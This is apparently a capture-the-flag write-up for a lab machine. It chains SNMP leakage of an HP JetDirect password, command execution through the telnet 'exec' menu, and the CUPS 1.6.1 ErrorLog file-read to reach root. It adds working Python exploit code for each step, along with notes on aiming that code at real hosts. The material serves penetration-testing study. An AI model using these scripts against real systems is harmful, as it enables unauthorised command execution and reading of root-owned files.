An initial Nmap scan of the target would not finish. Re-running it with --packet-trace showed that service detection kept looping at a password prompt on port 23 (telnet), so that port was excluded from the full TCP scan; with it excluded, no other TCP port turned out to be open:
$ nmap -sV -sC -PN -oA antique_nmap -p- --exclude-ports 23 10.10.11.107
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-28 19:29 CEST
Nmap scan report for 10.10.11.107
Host is up (0.074s latency).
All 65534 scanned ports on 10.10.11.107 are in ignored states.
Not shown: 65534 closed tcp ports (reset)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.14 seconds
Attempted a scan against common UDP ports and found port 161 (SNMP) open:
$ sudo nmap -sV -sC -sU -p 53,69,161,162,10161,10162,623 10.10.11.107
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-28 19:36 CEST
Nmap scan report for 10.10.11.107
Host is up (0.037s latency).
PORT      STATE  SERVICE       VERSION
53/udp    closed domain
69/udp    closed tftp
161/udp   open   snmp          SNMPv1 server (public)
162/udp   closed snmptrap
623/udp   closed asf-rmcp
10161/udp closed snmpdtls
10162/udp closed snmpdtls-trap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.90 seconds
The target runs an SNMPv1 agent that answers to the default community string public, so the whole MIB can be walked without any credentials using snmpwalk:
HP JetDirect devices are affected by CVE-2002-1048 (https://www.exploit-db.com/exploits/22319): the device password is readable over SNMP at OID .1.3.6.1.4.1.11.2.3.9.1.1.13.0, so querying that single OID returns it:
The first part of the output (50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33) is hex-encoded ASCII and decodes to P@ssw0rd@123!!123; the bytes that follow it are not part of the password. This password is accepted by the telnet service:
$ telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.
HP JetDirect
Password: P@ssw0rd@123!!123
Please type "?" for HELP
> ?
To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>
Parameter-name   Type of value
ip:              IP-address in dotted notation
subnet-mask:     address in dotted notation (enter 0 for default)
default-gw:      address in dotted notation (enter 0 for default)
syslog-svr:      address in dotted notation (enter 0 for default)
idle-timeout:    seconds in integers
set-cmnty-name:  alpha-numeric string (32 chars max)
host-name:       alpha-numeric string (upper case only, 32 chars max)
dhcp-config:     0 to disable, 1 to enable
allow:           <ip> [mask] (0 to clear, list to display, 10 max)
addrawport:      <TCP port num> (<TCP port num> 3000-9000)
deleterawport:   <TCP port num>
listrawport:     (No parameter required)
exec:            execute system commands (exec id)
exit:            quit from telnet session
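The hex-to-ASCII step used above to recover the JetDirect password, as an added example that is not code from the original write-up: a small Python parser for Net-SNMP's snmpwalk output that re-joins wrapped Hex-STRING lines, looks up OID .1.3.6.1.4.1.11.2.3.9.1.1.13.0 and keeps only the leading printable run, since the bytes after the password are padding. SAMPLE_OUTPUT is constructed for the example: the first 17 bytes of the Hex-STRING are the ones quoted above, while the sysName and sysUpTime lines and the trailing bytes are invented.

```python
"""Recover the HP JetDirect password from snmpwalk output (CVE-2002-1048).

Added example, not code from the write-up. SAMPLE_OUTPUT is constructed: only
the first 17 bytes of the Hex-STRING are the ones seen on the target; the other
lines and the trailing bytes are invented for the demo.
"""
import re
from typing import Dict, Optional, Tuple

JETDIRECT_PASSWORD_OID = ".1.3.6.1.4.1.11.2.3.9.1.1.13.0"

SAMPLE_OUTPUT = """\
iso.3.6.1.2.1.1.5.0 = STRING: "NPI-EXAMPLE"
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32
33 01 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF
iso.3.6.1.2.1.1.3.0 = Timeticks: (12345) 0:02:03.45
"""

# "<oid> = <TYPE>: <value>"; Net-SNMP wraps long Hex-STRING values onto bare continuation lines
ENTRY_RE = re.compile(r"^(?P<oid>\S+) = (?P<type>[\w-]+): ?(?P<value>.*)$")
HEX_BYTE_RE = re.compile(r"^[0-9A-Fa-f]{2}$")


def normalize_oid(oid: str) -> str:
    """snmpwalk prints the root as 'iso' when no MIBs are loaded; the CVE uses the numeric form."""
    if oid.startswith("iso"):
        oid = "1" + oid[3:]
    return oid if oid.startswith(".") else "." + oid


def parse_snmpwalk(text: str) -> Dict[str, Tuple[str, str]]:
    """Map each OID to (type, value), re-joining wrapped Hex-STRING lines."""
    entries: Dict[str, list] = {}
    current: Optional[str] = None
    for line in text.splitlines():
        line = line.rstrip()
        m = ENTRY_RE.match(line)
        if m:
            current = normalize_oid(m.group("oid"))
            entries[current] = [m.group("type"), m.group("value")]
        elif (current and entries[current][0] == "Hex-STRING" and line
              and all(HEX_BYTE_RE.match(tok) for tok in line.split())):
            entries[current][1] += " " + line      # continuation of the wrapped hex dump
    return {oid: (t, v.strip()) for oid, (t, v) in entries.items()}


def printable_prefix(data: bytes) -> str:
    """The password is the leading printable run; the device pads the value with other bytes."""
    out = []
    for b in data:
        if not 0x20 <= b < 0x7F:
            break
        out.append(chr(b))
    return "".join(out)


def jetdirect_password(snmpwalk_output: str) -> Optional[str]:
    """Return the password stored under the JetDirect OID, or None if it is not in the walk."""
    entry = parse_snmpwalk(snmpwalk_output).get(JETDIRECT_PASSWORD_OID)
    if entry is None:
        return None
    vtype, value = entry
    if vtype == "Hex-STRING":
        return printable_prefix(bytes(int(tok, 16) for tok in value.split()))
    if vtype == "STRING":          # printed as a quoted string when every byte is printable
        return value.strip('"')
    return None


if __name__ == "__main__":
    print(jetdirect_password(SAMPLE_OUTPUT))   # P@ssw0rd@123!!123
```

Feed it the saved output of `snmpwalk -v1 -c public <target>` and it returns the password whether Net-SNMP chose the Hex-STRING or the plain STRING rendering; a walk that does not contain the OID yields None rather than a garbled string.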
None of the commands except exec appear to do anything useful, but exec runs arbitrary system commands, so getting a reverse shell is trivial. From that shell, netstat shows that the telnet service is itself a python3 process, that the reverse shell is connected back to 10.10.16.16:9001, and that something is listening on loopback port 631:
$ netstat -tunap
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      1035/python3
tcp        0      0 10.10.11.107:23         10.10.16.16:43500       ESTABLISHED 1035/python3
tcp        0    286 10.10.11.107:56504      10.10.16.16:9001        ESTABLISHED 1273/python3
tcp6       0      0 ::1:631                 :::*                    LISTEN      -
udp        0      0 0.0.0.0:161             0.0.0.0:*                           -
udp        0      0 10.10.11.107:44271      8.8.8.8:53              ESTABLISHED
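The exec menu entry is a command-execution primitive, so driving it from a script rather than an interactive telnet session is worth having. Below is an added example, not code from the original write-up: a Python client that speaks only the two prompts seen in the session above ("Password: " and "> "), logs in, runs one `exec` command and returns its output, and treats a repeated password prompt as a rejected login instead of hanging. It sends plain lines and ignores telnet option negotiation, which is an assumption. Because no target is reachable here, demo() wires the client to fake_jetdirect, a constructed stand-in for the python3 service on port 23 whose command output is invented.

```python
"""Script the HP JetDirect telnet menu: log in and run `exec <cmd>`.

Added example, not code from the write-up. The client knows only the prompts
seen in the interactive session and sends bare lines (telnet negotiation is
assumed absent). fake_jetdirect and FAKE_COMMANDS are constructed for the
offline demo; they are not the real service.
"""
import socket
import threading
from typing import Sequence

PASSWORD_PROMPT = b"Password: "
SHELL_PROMPT = b"> "


def recv_until(sock: socket.socket, markers: Sequence[bytes], timeout: float = 5.0) -> bytes:
    """Read until one of `markers` appears; a hung prompt raises instead of blocking forever."""
    sock.settimeout(timeout)
    buf = b""
    while not any(m in buf for m in markers):
        chunk = sock.recv(4096)
        if not chunk:
            raise ConnectionError("connection closed while waiting for %r" % (markers,))
        buf += chunk
    return buf


def jetdirect_exec(sock: socket.socket, password: str, cmd: str) -> str:
    """Authenticate, run one command through the `exec` menu entry and return its output."""
    recv_until(sock, [PASSWORD_PROMPT])
    sock.sendall(password.encode() + b"\r\n")
    reply = recv_until(sock, [SHELL_PROMPT, PASSWORD_PROMPT])
    if SHELL_PROMPT not in reply:            # re-prompted: the password was rejected
        raise PermissionError("JetDirect rejected the password")
    sock.sendall(b"exec " + cmd.encode() + b"\r\n")
    out = recv_until(sock, [SHELL_PROMPT])
    sock.sendall(b"exit\r\n")
    # everything before the returning prompt is the command's output
    return out[: out.rfind(SHELL_PROMPT)].decode(errors="replace").strip()


# --- constructed stand-in for the python3 telnet service seen on port 23 ---
FAKE_PASSWORD = "P@ssw0rd@123!!123"                          # the password recovered over SNMP
FAKE_COMMANDS = {"id": "uid=7(lp) gid=7(lp) groups=7(lp)"}   # invented sample output


def fake_jetdirect(sock: socket.socket) -> None:
    """Banner, password loop, then a menu that answers `exec` and `exit` like the real prompt."""
    rf = sock.makefile("rb")
    try:
        sock.sendall(b"HP JetDirect\r\n" + PASSWORD_PROMPT)
        while True:
            line = rf.readline()
            if not line:                                   # client gave up
                return
            if line.strip() == FAKE_PASSWORD.encode():
                break
            sock.sendall(b"Invalid password\r\n" + PASSWORD_PROMPT)
        sock.sendall(b'Please type "?" for HELP\r\n' + SHELL_PROMPT)
        for line in rf:
            line = line.strip()
            if line == b"exit":
                return
            if line.startswith(b"exec "):
                output = FAKE_COMMANDS.get(line[5:].decode(), "sh: command not found")
                sock.sendall(output.encode() + b"\r\n")
            sock.sendall(SHELL_PROMPT)
    finally:
        rf.close()
        sock.close()


def demo(password: str = FAKE_PASSWORD, cmd: str = "id") -> str:
    """Run the client against the fake service over a socketpair (no network needed)."""
    client, server = socket.socketpair()
    worker = threading.Thread(target=fake_jetdirect, args=(server,), daemon=True)
    worker.start()
    try:
        return jetdirect_exec(client, password, cmd)
    finally:
        client.close()
        worker.join(timeout=5)


if __name__ == "__main__":
    print(demo())   # uid=7(lp) gid=7(lp) groups=7(lp)
```

Against a real target, replace the socketpair with `socket.create_connection((host, 23))` and pass that socket to jetdirect_exec. The output delimiter is the "> " prompt itself, so a command whose output contains that sequence would be truncated; redirecting such output to a file and fetching it in a second exec call avoids the problem.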
Port 631 is the default port for CUPS. It is bound to loopback only, and netstat shows no PID for it, so the process belongs to a user other than the one the shell runs as (cupsd normally runs as root). Checking the service confirms it is CUPS:
Version 1.6.1 of CUPS is affected by CVE-2012-5519, an arbitrary file read as root: cupsd runs as root and lets members of the lpadmin group change its configuration, so the ErrorLog path can be pointed at any file, which cupsd then serves back through its web interface. This is a local privilege-escalation primitive rather than an unauthenticated remote one, so it requires the shell obtained above to belong to a user in lpadmin. A PoC for it is available. Uploaded it to the target and used it to get the root flag.
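The file-read primitive behind CVE-2012-5519, as an added example that is not the PoC used in the write-up: `cupsctl ErrorLog=<path>` repoints the daemon's error log, the web interface on 127.0.0.1:631 then serves that file from /admin/log/error_log, and the setting is restored afterwards so printing keeps working. Assumptions: the shell user is in lpadmin, cupsd listens on loopback port 631 as netstat showed, /var/log/cups/error_log is the default log path, and /root/root.txt is the file wanted. The `run` and `fetch` callables are injectable so that demo() can exercise the whole flow against FakeCups, a constructed stand-in, instead of a live daemon; FAKE_FILES and the "Forbidden" error text are invented.

```python
"""Arbitrary file read as root via CUPS 1.6.1 (CVE-2012-5519).

Added example, not the PoC used in the write-up. Assumptions: lpadmin
membership, cupsd on 127.0.0.1:631, the default ErrorLog path below and the
target file. FakeCups, FAKE_FILES and its error text are constructed.
"""
import io
import subprocess
import urllib.request
from typing import Callable

CUPS_URL = "http://127.0.0.1:631"
DEFAULT_ERROR_LOG = "/var/log/cups/error_log"   # assumed distro default, restored afterwards


def set_error_log(path: str, run: Callable = subprocess.run) -> None:
    """Same as `cupsctl ErrorLog=<path>`; cupsctl refuses it unless we are in lpadmin."""
    result = run(["cupsctl", "ErrorLog=" + path], capture_output=True, text=True)
    if result.returncode != 0:
        raise PermissionError("cupsctl rejected the change: " + result.stderr.strip())


def read_error_log(fetch: Callable = urllib.request.urlopen) -> str:
    """cupsd (running as root) serves whatever ErrorLog currently points at through its web UI."""
    with fetch(CUPS_URL + "/admin/log/error_log") as resp:
        return resp.read().decode(errors="replace")


def leak_file(path: str, run=subprocess.run, fetch=urllib.request.urlopen) -> str:
    """Point the log at `path`, read it back, and always restore the original setting."""
    set_error_log(path, run)
    try:
        return read_error_log(fetch)
    finally:
        set_error_log(DEFAULT_ERROR_LOG, run)   # put the log back so printing keeps working


# --- constructed fake so the flow can be exercised offline ---
FAKE_FILES = {
    "/root/root.txt": "constructed-root-flag\n",
    DEFAULT_ERROR_LOG: "constructed cupsd log line\n",
}


class FakeCups:
    """Tracks the ErrorLog setting like cupsd and serves its target like /admin/log/error_log."""

    def __init__(self, in_lpadmin: bool = True):
        self.error_log = DEFAULT_ERROR_LOG
        self.in_lpadmin = in_lpadmin

    def run(self, argv, **kwargs):
        if argv[0] != "cupsctl" or not self.in_lpadmin:
            return subprocess.CompletedProcess(argv, 1, stdout="", stderr="cupsctl: Forbidden")
        key, _, value = argv[1].partition("=")
        if key == "ErrorLog":
            self.error_log = value
        return subprocess.CompletedProcess(argv, 0, stdout="", stderr="")

    def fetch(self, url: str):
        if url != CUPS_URL + "/admin/log/error_log":
            raise ValueError("unexpected URL " + url)
        return io.BytesIO(FAKE_FILES.get(self.error_log, "").encode())


def demo(in_lpadmin: bool = True):
    """Returns (leaked content, ErrorLog setting after cleanup)."""
    cups = FakeCups(in_lpadmin)
    content = leak_file("/root/root.txt", run=cups.run, fetch=cups.fetch)
    return content, cups.error_log


if __name__ == "__main__":
    print(demo()[0])   # constructed-root-flag
```

On the target itself the same three steps are `leak_file("/root/root.txt")` with the default `run` and `fetch`, i.e. real cupsctl and a real GET against the loopback web interface. The fixed ordering matters for a practitioner: a PoC that fails after the cupsctl call and before restoring ErrorLog leaves cupsd logging into the victim file.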